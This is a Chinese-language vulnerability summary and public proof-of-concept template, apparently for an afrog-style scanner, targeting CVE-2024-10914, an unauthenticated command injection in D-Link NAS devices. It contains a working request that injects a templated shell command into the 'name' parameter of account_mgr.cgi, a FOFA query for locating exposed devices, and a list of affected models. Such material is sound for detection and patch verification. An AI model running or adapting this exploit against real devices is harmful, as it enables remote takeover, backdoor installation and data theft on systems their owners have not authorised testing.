漏洞描述
D-Link NAS设备的/cgi-bin/account_mgr.cgi接口处存在命令注入漏洞,未经身份验证的攻击者通过特制的HTTP请求可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
fofa: app="D_Link-DNS-ShareCenter"
CVE-2024-10914: D-Link NAS account_mgr.cgi存在远程命令执行
PoC代码[已公开]
id: CVE-2024-10914
info:
name: D-Link NAS account_mgr.cgi存在远程命令执行
author: zan8in
severity: critical
verified: true
description: |-
D-Link NAS设备的/cgi-bin/account_mgr.cgi接口处存在命令注入漏洞,未经身份验证的攻击者通过特制的HTTP请求可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
fofa: app="D_Link-DNS-ShareCenter"
affected: |-
DNS-320 1.00
DNS-320LW 1.01.0914.2012
DNS-325 1.01
DNS-325 1.02
DNS-340L 1.08
reference:
- https://mp.weixin.qq.com/s/UILrkEAsD1CYlqEhbH9QZQ
tags: dlink,cve,cve2024,rce,nas
created: 2024/11/18
set:
hostname: request.url.host
command: "ifconfig"
rules:
r0:
request:
raw: |-
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
expression: |
response.status == 200 && response.body.bcontains(b'inet addr:') && response.body.ibcontains(b'Mask:') && response.body.bcontains(b"Content-type: text/html")
expression: r0()